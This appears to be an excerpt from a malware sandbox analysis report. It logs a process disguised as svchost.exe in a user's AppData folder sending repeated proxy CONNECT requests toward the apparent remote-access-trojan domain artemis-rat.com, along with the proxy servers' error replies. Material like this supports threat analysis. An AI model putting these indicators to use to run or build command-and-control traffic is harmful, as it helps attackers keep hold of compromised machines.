                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1825192.168.2.55533761.129.2.212808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.631548882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.180006981 CET59INHTTP/1.1 200 Connection Established
                                                                                    Proxy-agent: nginx


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1826192.168.2.555356196.20.125.149808343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.631611109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1827192.168.2.555453142.54.239.1414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.651806116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1828192.168.2.555504172.67.181.1978043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.677484989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.832470894 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1829192.168.2.555480198.12.255.193682143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.702227116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.270761967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.974039078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.380471945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.964801073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.974226952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1830192.168.2.555536172.67.255.2248043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.712570906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.868083954 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1831192.168.2.55539143.131.248.1651567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.714965105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1832192.168.2.555513162.214.227.686043343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.715826988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.270677090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.871222019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.064063072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.380624056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.771055937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.117486954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1833192.168.2.555518104.37.135.145414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.721666098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1834192.168.2.55541131.207.38.668043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.737663031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.038696051 CET408INHTTP/1.1 405 Method Not Allowed
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Server: Apache
                                                                                    Allow: OPTIONS,HEAD,GET,POST
                                                                                    Content-Length: 224
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1835192.168.2.55540743.155.130.1821567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.737664938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1836192.168.2.555569104.19.83.1288043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.739976883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.894586086 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1837192.168.2.555409120.76.42.209888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.758646011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1838192.168.2.55574343.153.175.4344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.765547037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1839192.168.2.55574543.153.175.4344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.767406940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1840192.168.2.55574643.153.175.4344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.771401882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1841192.168.2.555474155.185.15.56312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.802715063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.247133017 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1842192.168.2.55549427.96.235.1718043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.802715063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1843192.168.2.555481110.12.211.1408043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.803303003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1844192.168.2.555449185.104.112.628043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.810203075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.153601885 CET799INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Server: Apache/2.4.56 (Debian)
                                                                                    Content-Length: 607
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 71 73 68 6e 40 6d 61 69 6c 2e 72 75 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at qshn@mail.ru to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.56 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1845192.168.2.555543184.178.172.51530343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.818404913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1846192.168.2.555478185.158.114.142569743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.820615053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1847192.168.2.55550080.13.43.1938043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.825504065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.567709923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.564310074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.380615950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.020591021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1848192.168.2.555614104.16.104.128043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.829618931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.983956099 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
